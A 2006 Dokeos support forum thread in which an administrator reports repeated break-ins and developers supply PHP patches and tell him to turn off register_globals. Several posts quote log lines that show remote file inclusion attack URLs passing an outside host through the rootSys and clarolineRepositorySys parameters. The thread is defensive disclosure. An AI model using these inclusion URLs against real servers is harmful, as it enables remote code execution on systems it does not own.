Dokeos Forum

by **vianney** » Wed Apr 05, 2006 6:45 pm

Is there a known security vulnerability with
/claroline/exercice/testheaderpage.php?rootSys ?

My server has been kacked using this URL
/claroline/exercice/testheaderpage.php?rootSys=http://www.mptechno.cz/cse.gif?&c etc.

on Dokeos 1.6.2

Thank you for your help.

by **pcool** » Wed Apr 05, 2006 7:21 pm

This is indeed a security hole. You can expect a new dokeos version tomorrow.

If you want to fix this already you have to do the following:
<ol> <li>open inc/claro_init_global.inc.php</li> <li>find the 4 occurrences of
<pre>if(!isset($_SESSION[$key]) && $key != 'includePath')
</pre> </li> <li>replace these 4 occurrences into

if(!isset($_SESSION[$key]) && $key != 'includePath' && $key
!= 'rootSys' && $key!= 'clarolineRepositorySys' && $key!= 'lang_path' &&
$key!= 'extAuthSource' && $key!= 'thisAuthSource' && $key!=
'main_configuration_file_path' && $key!= 'phpDigIncCn' && $key!= 'drs')</li></ol>

by **vianney** » Wed Apr 05, 2006 7:31 pm

thank you very much

by **pcool** » Wed Apr 05, 2006 7:36 pm

an alternative solution (but equally good and maybe easier to implement) (although I prefer the first solution)

add somewhere on the top of the page of claro_init_global.inc.php (solution by Olivier and René)

 foreach (array('includePath', 'rootSys', 'clarolineRepositorySys') as $dontfake)
{
unset($_GET[$dontfake], $HTTP_GET_VARS[$dontfake], $_POST[$dontfake],$HTTP_POST_VARS[$dontfake]);
}

by **domifreitas** » Thu Apr 06, 2006 9:18 am

Should we do the same upgrade for Dokeos community release 2.0.2?

by **turboke** » Thu Apr 06, 2006 10:46 am

domifreitas wrote:Should we do the same upgrade for Dokeos community release 2.0.2?

You should. The patch will be included in CR 2.0.3 (see <a href="http://www.dokeos.com/forum/viewtopic.php?p=27903#27903">this post</a>).

by **roan** » Thu Apr 06, 2006 11:43 am

turboke wrote:
domifreitas wrote:Should we do the same upgrade for Dokeos community release 2.0.2?

You should. The patch will be included in CR 2.0.3 (see <a href="http://www.dokeos.com/forum/viewtopic.php?p=27903#27903">this post</a>).

Community release 2.0.3 with the security fix is <a href="http://www.dokeos.com/forum/viewtopic.php?p=27910#27910">ready now</a>.
Update: more security fixes available in the new <a href="http://www.dokeos.com/wiki/index.php/Dokeos_community_2.0.4_release_notes">community release 2.0.4</a>.

by **vianney** » Thu Apr 06, 2006 2:48 pm

pcool wrote:This is indeed a security hole. You can expect a new dokeos version tomorrow.

If you want to fix this already you have to do the following:
<ol> <li>open inc/claro_init_global.inc.php</li> <li>find the 4 occurrences of
<pre>if(!isset($_SESSION[$key]) && $key != 'includePath')
</pre> </li> <li>replace these 4 occurrences into

if(!isset($_SESSION[$key]) && $key != 'includePath' && $key
!= 'rootSys' && $key!= 'clarolineRepositorySys' && $key!= 'lang_path' &&
$key!= 'extAuthSource' && $key!= 'thisAuthSource' && $key!=
'main_configuration_file_path' && $key!= 'phpDigIncCn' && $key!= 'drs')</li></ol>

Are you sure this is enof ? I applied this code yesterday, like this. But my server is hacked for the second time today, in the same way :

[06/Apr/2006:14:52:59 +0200] "GET /claroline/exercice/testheaderpage.php?rootSys=http://www.mptechno.cz/cse.gif?&cmd=cd...
etc.

by **pcool** » Thu Apr 06, 2006 2:54 pm

can you post your claro_init_global.inc.php here so that we can verify if you applied the fix correctly.

by **vianney** » Thu Apr 06, 2006 3:07 pm

here it is :

by **pcool** » Thu Apr 06, 2006 3:45 pm

your server probably has register_globals=on in php.ini
These should be set to off

You can also use the second approach in this case. Add to the top of claro_init_global.inc.php:
 foreach (array('includePath', 'rootSys', 'clarolineRepositorySys') as $dontfake)
{
unset($_GET[$dontfake], $HTTP_GET_VARS[$dontfake], $_POST[$dontfake],$HTTP_POST_VARS[$dontfake]);
}

by **vianney** » Thu Apr 06, 2006 5:31 pm

I will try.
Actually, register_global is on.
Do "off" should or must be used for Dokeos ? I thought it was "should".

Actualy the 3rd hack, they like me :-(
it is quite different :

[06/Apr/2006:17:18:50 +0200] "GET /claroline/resourcelinker/resourcelinker.inc.php?clarolineRepositorySys=http://www.mptechno.cz/cse.gif?&c
etc

Is the new code OK for that too ?

by **Tripple** » Thu Apr 06, 2006 7:51 pm

I added the fix on my Dokeos 1.6.1 installation.
How do I know if I was hacked? Do I have to search my logfile for 'rootSys'?

by **roan** » Thu Apr 06, 2006 9:57 pm

vianney wrote:I will try.
Actually, register_global is on.
Do "off" should or must be used for Dokeos ? I thought it was "should".

Dokeos works with register globals on or off. We strongly suggest you set it to off, because setting it to on is a huge security risk.

by **Tripple** » Thu Apr 06, 2006 10:03 pm

roan wrote:Dokeos works with register globals on or off. We strongly suggest you set it to off, because setting it to on is a huge security risk.

Does Dokeos 1.6.1 works with globals off?

by **roan** » Thu Apr 06, 2006 10:17 pm

Tripple wrote:
roan wrote:Dokeos works with register globals on or off. We strongly suggest you set it to off, because setting it to on is a huge security risk.

Does Dokeos 1.6.1 works with globals off?

Yes, from Dokeos 1.6.0 and community release 2.0 upwards Dokeos works with register_globals off. I can't remember about Dokeos 1.5.x but those users should upgrade anyway ;-)

However we performed a small trick to make this happen, which caused this security problem. In the next major releases (community release 2.1 and plain Dokeos 1.8) this trick is going to be removed to make Dokeos more secure.

by **vianney** » Fri Apr 07, 2006 7:35 am

roan wrote:Dokeos works with register globals on or off. We strongly suggest you set it to off, because setting it to on is a huge security risk.

in the INSTALL file it is said that :

Past Dokeos versions required register_globals to be set to On. This is no
longer necessary, this can be set to Off and Dokeos will work fine.

But as I can see with my experience it can't be used with register_globals "On" because there is a major security hole when it is used in production this way.
Dokeos should tell it clearly.

Secondly, I can tell you that the two possibilities of code you proposed against the hole presented in this post are inactives when register_globals is On.

by **pcool** » Fri Apr 07, 2006 8:15 am

When register globals is set to on then the only hole that still exists is in resourcelinker.inc.php.
Dokeos 1.6.4 zip package has the corrected resourcelinker.inc.php file already (tar.gz doesn't yet).
I noticed today that not all my fixes made it to the CVS (I have lost all my icons on my windows box so I could not see if the files were changed or not)

What I advise you is
1. set registerglobals to OFF
2. take the dokeos1.6.4 ZIP package and use this one to update your campus.

by **frmartens** » Fri Apr 07, 2006 8:23 am

pcool wrote:Dokeos 1.6.4 zip package has the corrected resourcelinker.inc.php file already (tar.gz doesn't yet).

Is this possible? Both files should be created on the same CVS tag.

I'm also wondering : is the zip file only intended to be installed on a windows server or is it just another means of packaging it ?

by **pcool** » Fri Apr 07, 2006 9:03 am

It's just a mean of packaging.
I manually added the corrected files to the zip file but couldn't do this for the tar.gz

Dokeos Forum

[Fixed Dokeos 1.6.4] is it a security problem ?

[Fixed Dokeos 1.6.4] is it a security problem ?

Who is online